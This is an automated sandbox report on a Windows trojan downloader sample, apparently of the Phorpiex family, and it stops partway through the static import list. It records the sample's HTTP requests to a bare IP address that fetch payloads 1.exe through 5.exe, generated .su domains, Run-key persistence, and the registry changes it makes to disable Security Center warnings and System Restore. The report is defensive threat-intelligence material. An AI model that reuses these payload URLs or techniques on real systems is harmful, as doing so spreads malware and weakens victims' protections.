- [*] MalFamily: ""
- [*] MalScore: 10.0
- [*] File Name: "Exes_56c329b835490a887a6a941adfa6e4c2.exe"
- [*] File Size: 292352
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "fa9020c32b1c1b810b6c261e77863411bc64e70aed6d2a3bbbb82ebdcbaf8740"
- [*] MD5: "56c329b835490a887a6a941adfa6e4c2"
- [*] SHA1: "fa831efbbe48deb179980e00042c91ae99d5bf20"
- [*] SHA512: "a29b5ae11a016b6d64bbd482416e476525f6e67d34e11485aa47a6e361a0b451492d4422647b0a79a9f69086c85faed987236ebafb9c80410a5c9efe7c7bcba9"
- [*] CRC32: "0DF89228"
- [*] SSDEEP: "6144:UvTr7niBcKnBGNYzF4BupEjMvFs4/2bR4d:637nOcKByKF4BAEQO4/O4d"
- [*] Process Execution: [
- "Exes_56c329b835490a887a6a941adfa6e4c2.exe",
- "winmonw.exe",
- "1017334714.exe",
- "3625111283.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
- "Details": []
- },
- {
- "Description": "Drops a binary and executes it",
- "Details": [
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe"
- },
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe"
- },
- {
- "binary": "C:\\Windows\\3356173911556488\\winmonw.exe"
- }
- ]
- },
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- },
- {
- "suspicious_request": "http://193.32.161.77/tldr.php?new=1"
- },
- {
- "suspicious_request": "http://193.32.161.77/tldr.php?on=1"
- },
- {
- "suspicious_request": "http://193.32.161.77/1.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/2.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/3.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/4.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/5.exe"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://193.32.161.77/tldr.php?new=1"
- },
- {
- "url": "http://193.32.161.77/tldr.php?on=1"
- },
- {
- "url": "http://193.32.161.77/1.exe"
- },
- {
- "url": "http://193.32.161.77/2.exe"
- },
- {
- "url": "http://193.32.161.77/3.exe"
- },
- {
- "url": "http://193.32.161.77/4.exe"
- },
- {
- "url": "http://193.32.161.77/5.exe"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
- }
- ]
- },
- {
- "Description": "Detects Sandboxie through the presence of a library",
- "Details": []
- },
- {
- "Description": "Detects SunBelt Sandbox through the presence of a library",
- "Details": []
- },
- {
- "Description": "Attempts to remove evidence of file being downloaded from the Internet",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe:Zone.Identifier"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
- },
- {
- "data": "C:\\Windows\\3356173911556488\\winmonw.exe"
- },
- {
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
- },
- {
- "data": "C:\\Windows\\3356173911556488\\winmonw.exe"
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Windows\\3356173911556488"
- },
- {
- "file": "C:\\Windows\\3356173911556488\\winmonw.exe"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt"
- }
- ]
- },
- {
- "Description": "File has been identified by 38 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "MicroWorld-eScan": "Trojan.GenericKD.41379811"
- },
- {
- "FireEye": "Generic.mg.56c329b835490a88"
- },
- {
- "McAfee": "Trojan-FQZA!56C329B83549"
- },
- {
- "AegisLab": "Trojan.Win32.Generic.mnLK"
- },
- {
- "K7AntiVirus": "Riskware ( 0040eff71 )"
- },
- {
- "Cybereason": "malicious.bbe48d"
- },
- {
- "Symantec": "ML.Attribute.HighConfidence"
- },
- {
- "ESET-NOD32": "a variant of Win32/Kryptik.GUBX"
- },
- {
- "APEX": "Malicious"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "Kaspersky": "Trojan-Downloader.Win32.Trik.fx"
- },
- {
- "BitDefender": "Trojan.GenericKD.41379811"
- },
- {
- "Avast": "Win32:Trojan-gen"
- },
- {
- "Ad-Aware": "Trojan.Ransomware.GenericKDS.32066721"
- },
- {
- "Comodo": "TrojWare.Win32.Fakecsrss.AV@88nqyj"
- },
- {
- "F-Secure": "Trojan.TR/AD.Phorpiex.vkkfn"
- },
- {
- "Invincea": "heuristic"
- },
- {
- "McAfee-GW-Edition": "BehavesLike.Win32.Generic.dh"
- },
- {
- "Emsisoft": "Trojan.GenericKD.41379811 (B)"
- },
- {
- "Endgame": "malicious (high confidence)"
- },
- {
- "Avira": "TR/AD.Phorpiex.vkkfn"
- },
- {
- "Microsoft": "Trojan:Win32/Fuery.A!cl"
- },
- {
- "Arcabit": "Trojan.Ransomware.GenericS.D1E94CA1"
- },
- {
- "ViRobot": "Trojan.Win32.Z.Highconfidence.292352.B"
- },
- {
- "ZoneAlarm": "Trojan-Downloader.Win32.Trik.fx"
- },
- {
- "GData": "Win32.Worm.Phorpiex.402DNM"
- },
- {
- "AhnLab-V3": "Malware/Win32.Generic.C3291999"
- },
- {
- "Acronis": "suspicious"
- },
- {
- "VBA32": "BScope.Trojan.Sehyioa"
- },
- {
- "Cylance": "Unsafe"
- },
- {
- "Rising": "Trojan.Fuery!8.EAFB (CLOUD)"
- },
- {
- "SentinelOne": "DFI - Suspicious PE"
- },
- {
- "Fortinet": "W32/Kryptik.GUBX!tr"
- },
- {
- "MaxSecure": "Ransomeware.GandCrypt.Gen"
- },
- {
- "AVG": "Win32:Trojan-gen"
- },
- {
- "Panda": "Trj/Genetic.gen"
- },
- {
- "CrowdStrike": "win/malicious_confidence_70% (W)"
- },
- {
- "Qihoo-360": "HEUR/QVM10.2.F183.Malware.Gen"
- }
- ]
- },
- {
- "Description": "Operates on local firewall's policies and settings",
- "Details": []
- },
- {
- "Description": "Creates a copy of itself",
- "Details": [
- {
- "copy": "C:\\Windows\\3356173911556488\\winmonw.exe"
- },
- {
- "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe"
- }
- ]
- },
- {
- "Description": "Attempts to disable System Restore",
- "Details": []
- },
- {
- "Description": "Attempts to modify or disable Security Center warnings",
- "Details": []
- },
- {
- "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_56c329b835490a887a6a941adfa6e4c2.exe:Zone.Iduentifier"
- },
- {
- "file": "C:\\Windows\\3356173911556488\\winmonw.exe:Zone.Iduentifier"
- }
- ]
- },
- {
- "Description": "Created network traffic indicative of malicious activity",
- "Details": [
- {
- "signature": "ET TROJAN Single char EXE direct download likely trojan (multiple families)"
- },
- {
- "signature": "ET DNS Query for .su TLD (Soviet Union) Often Malware Related"
- }
- ]
- }
- ]
- [*] Started Service: []
- [*] Executed Commands: [
- "C:\\Windows\\3356173911556488\\winmonw.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe"
- ]
- [*] Mutexes: [
- "4550003930"
- ]
- [*] Modified Files: [
- "C:\\Windows\\3356173911556488\\winmonw.exe",
- "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_56c329b835490a887a6a941adfa6e4c2.exe:Zone.Iduentifier",
- "C:\\Windows\\3356173911556488\\winmonw.exe:Zone.Iduentifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe:Zone.Identifier"
- ]
- [*] Modified Registry Keys: [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AutoUpdateDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR"
- ]
- [*] Deleted Registry Keys: []
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "aiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "abaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xeoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "",
- "domain": "teubeufubg.su"
- },
- {
- "ip": "",
- "domain": "tbaeubuegs.su"
- },
- {
- "ip": "",
- "domain": "wniaeninie.su"
- },
- {
- "ip": "",
- "domain": "aiaeufaehe.su"
- },
- {
- "ip": "",
- "domain": "xiheiufisd.su"
- },
- {
- "ip": "",
- "domain": "teuaueudgs.su"
- },
- {
- "ip": "",
- "domain": "xbaeubuegs.su"
- },
- {
- "ip": "",
- "domain": "wiheiufisd.su"
- },
- {
- "ip": "",
- "domain": "xeoghehofu.su"
- },
- {
- "ip": "",
- "domain": "wbaeubuegs.su"
- },
- {
- "ip": "",
- "domain": "abaeubuegs.su"
- },
- {
- "ip": "",
- "domain": "tieieieros.su"
- },
- {
- "ip": "",
- "domain": "aeuaueudgs.su"
- },
- {
- "ip": "",
- "domain": "weubeufubg.su"
- },
- {
- "ip": "",
- "domain": "wiaeufaehe.su"
- },
- {
- "ip": "",
- "domain": "aeubeufubg.su"
- },
- {
- "ip": "",
- "domain": "aeoghehofu.su"
- },
- {
- "ip": "",
- "domain": "weoghehofu.su"
- },
- {
- "ip": "",
- "domain": "aniaeninie.su"
- },
- {
- "ip": "",
- "domain": "xieieieros.su"
- },
- {
- "ip": "",
- "domain": "wieieieros.su"
- },
- {
- "ip": "",
- "domain": "tiaeufaehe.su"
- },
- {
- "ip": "",
- "domain": "aiheiufisd.su"
- },
- {
- "ip": "",
- "domain": "xiaeufaehe.su"
- },
- {
- "ip": "",
- "domain": "tniaeninie.su"
- },
- {
- "ip": "",
- "domain": "xniaeninie.su"
- },
- {
- "ip": "",
- "domain": "weuaueudgs.su"
- },
- {
- "ip": "",
- "domain": "teoghehofu.su"
- },
- {
- "ip": "",
- "domain": "aieieieros.su"
- },
- {
- "ip": "",
- "domain": "tiheiufisd.su"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/tldr.php?new=1",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/tldr.php?new=1",
- "data": "GET /tldr.php?new=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/tldr.php?on=1",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/tldr.php?on=1",
- "data": "GET /tldr.php?on=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/1.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/1.exe",
- "data": "GET /1.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/2.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/2.exe",
- "data": "GET /2.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/3.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/3.exe",
- "data": "GET /3.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/4.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/4.exe",
- "data": "GET /4.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/5.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/5.exe",
- "data": "GET /5.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 150849\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 10:50:30 GMT\r\nIf-None-Match: \"5ced1276-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nCache-Control: max-age = 135176\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 05:30:18 GMT\r\nIf-None-Match: \"5cecc76a-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 168744\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 15:00:08 GMT\r\nIf-None-Match: \"5ced4cf8-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FillConsoleOutputCharacterA",
- "address": "0x42b000"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x42b004"
- },
- {
- "name": "GetNativeSystemInfo",
- "address": "0x42b008"
- },
- {
- "name": "SetLocaleInfoA",
- "address": "0x42b00c"
- },
- {
- "name": "WritePrivateProfileStructA",
- "address": "0x42b010"
- },
- {
- "name": "GetDefaultCommConfigW",
- "address": "0x42b014"
- },
- {
- "name": "FindResourceW",
- "address": "0x42b018"
- },
- {
- "name": "WaitNamedPipeA",
- "address": "0x42b01c"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x42b020"
- },
- {
- "name": "SetTapeParameters",
- "address": "0x42b024"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x42b028"
- },
- {
- "name": "GetTickCount",
- "address": "0x42b02c"
- },
- {
- "name": "ExpandEnvironmentStringsA",
- "address": "0x42b030"
- },
- {
- "name": "ReadConsoleW",
- "address": "0x42b034"
- },
- {
- "name": "FormatMessageA",
- "address": "0x42b038"
- },
- {
- "name": "EnumTimeFormatsA",
- "address": "0x42b03c"
- },
- {
- "name": "EnumTimeFormatsW",
- "address": "0x42b040"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x42b044"
- },
- {
- "name": "GetFirmwareEnvironmentVariableA",
- "address": "0x42b048"
- },
- {
- "name": "GetStringTypeExW",
- "address": "0x42b04c"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x42b050"
- },
- {
- "name": "GetVolumePathNamesForVolumeNameW",
- "address": "0x42b054"
- },
- {
- "name": "ReplaceFileW",
- "address": "0x42b058"
- },
- {
- "name": "GetSystemDirectoryA",
- "address": "0x42b05c"
- },
- {
- "name": "CreateMailslotW",
- "address": "0x42b060"
- },
- {
- "name": "WritePrivateProfileStringW",
- "address": "0x42b064"
- },
- {
- "name": "EnumSystemLocalesA",
- "address": "0x42b068"
- },
- {
- "name": "VerifyVersionInfoW",
- "address": "0x42b06c"
- },
- {
- "name": "GetProfileIntA",
- "address": "0x42b070"
- },
- {
- "name": "Module32First",
- "address": "0x42b074"
- },
- {
- "name": "GetProcAddress",
- "address": "0x42b078"
- },
- {
- "name": "GetLongPathNameA",
- "address": "0x42b07c"
- },
- {
- "name": "DefineDosDeviceW",
- "address": "0x42b080"
- },
- {
- "name": "HeapUnlock",
- "address": "0x42b084"
- },
- {
- "name": "MoveFileW",
- "address": "0x42b088"
- },
- {
- "name": "GetAtomNameA",
- "address": "0x42b08c"
- },
- {
- "name": "LocalAlloc",
- "address": "0x42b090"
- },
- {
- "name": "FindFirstVolumeMountPointW",
- "address": "0x42b094"
- },
- {
- "name": "OpenEventA",
- "address": "0x42b098"
- },
- {
- "name": "GetProfileStringA",
- "address": "0x42b09c"
- },
- {
- "name": "OpenJobObjectW",
- "address": "0x42b0a0"
- },
- {
- "name": "GetThreadPriority",
- "address": "0x42b0a4"
- },
- {
- "name": "FindFirstChangeNotificationA",
- "address": "0x42b0a8"
- },
- {
- "name": "WriteProfileStringW",
- "address": "0x42b0ac"
- },
- {
- "name": "MoveFileWithProgressW",
- "address": "0x42b0b0"
- },
- {
- "name": "GetConsoleProcessList",
- "address": "0x42b0b4"
- },
- {
- "name": "ExpandEnvironmentStringsW",
- "address": "0x42b0b8"
- },
- {
- "name": "CreateFileW",
- "address": "0x42b0bc"
- },
- {
- "name": "FlushFileBuffers",
- "address": "0x42b0c0"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x42b0c4"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x42b0c8"
- },
- {
- "name": "SetStdHandle",
- "address": "0x42b0cc"
- },
- {
- "name": "OutputDebugStringW",
- "address": "0x42b0d0"
- },
- {
- "name": "EnumSystemLocalesW",
- "address": "0x42b0d4"
- },
- {
- "name": "EncodePointer",
- "address": "0x42b0d8"
- },
- {
- "name": "DecodePointer",
- "address": "0x42b0dc"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x42b0e0"
- },
- {
- "name": "RaiseException",
- "address": "0x42b0e4"
- },
- {
- "name": "RtlUnwind",
- "address": "0x42b0e8"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x42b0ec"
- },
- {
- "name": "GetLastError",
- "address": "0x42b0f0"
- },
- {
- "name": "ExitProcess",
- "address": "0x42b0f4"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x42b0f8"
- },
- {
- "name": "AreFileApisANSI",
- "address": "0x42b0fc"
- },
- {
